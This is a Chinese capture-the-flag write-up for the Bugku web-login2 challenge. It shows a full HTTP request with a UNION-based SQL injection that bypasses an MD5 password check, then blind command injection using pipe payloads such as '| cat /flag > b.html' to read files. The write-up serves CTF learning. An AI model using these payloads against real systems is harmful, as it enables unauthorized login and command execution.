bugku-web-login2

这里提示是命令执行

抓包发现有五个报文

其中login.php中有base64加密语句

复制代码
$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

这里得到SQL语句的组成,开始绕过密码判断

复制代码
POST /login.php HTTP/1.1
Host: 114.67.175.224:14715
Content-Length: 52
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.67.175.224:14715
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://114.67.175.224:14715/login.php?password=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_c1b044f909411ac4213045f0478e96fc=1711286763; _ga=GA1.1.52075818.1711286767; _ga_F3VRZT58SJ=GS1.1.1711288951.2.1.1711290145.0.0.0; PHPSESSID=ohlo1q3nbms2srg6aav8cgase6
Connection: close

username=admin'UNION SELECT 1,md5(123)#&password=123

这里账号为admin,然后使用联合查询使得返回的两个空格,1空格代表账号,二空格代表密码,这里我们直接将二空格的密码填充为123的md5值,row\['password'\]得到的就是这个123的md5值,而我们用password传递的123就会变成password,这时row\['password'\]===md5(password)为真,成功绕过密码

来到服务查询页面

试了试ssh等服务查询

开始命令执行绕过

命令执行没有回显

利用sleep看看是否执行了

这里确实是执行了,但是没有回显

将结果写成可访问文件

复制代码
| ls / > a.html

访问得到命令执行回显

看到flag文件

| cat /flag > b.html

得到flag

相关推荐
壹方秘境几秒前
使用ApiCatcher在 iOS 上像修改 hosts 一样自定义域名解析
前端·后端·客户端
柳杉22 分钟前
可视化大屏设计器脚手架:从设计到交付的一站式方案
前端·three.js·数据可视化
kyriewen14 小时前
我手写了一个 EventEmitter,面试官追问了 6 个问题——第 4 个我没答上来
前端·javascript·面试
IT_陈寒14 小时前
Java的Date类又坑了我一次,改用时间戳真香
前端·人工智能·后端
小林攻城狮15 小时前
使用 Transport 节流解决 Vercel AI SDK 流式渲染卡死问题
前端·react.js
前端缘梦15 小时前
告别 TS 运行时类型漏洞!Zod 完整入门实战教程(前端 / 全栈必备)
前端·react.js·全栈
the_answer15 小时前
Webpack vs Vite 深度对比分析
前端·webpack
转转技术团队15 小时前
验证码识别实战:前端不写页面,改训模型了?
前端
MomentYY15 小时前
Temperature:AI 的“脑洞旋钮”
前端·llm·ai编程
远航_16 小时前
OpenSpec 完整详细介绍
前端·后端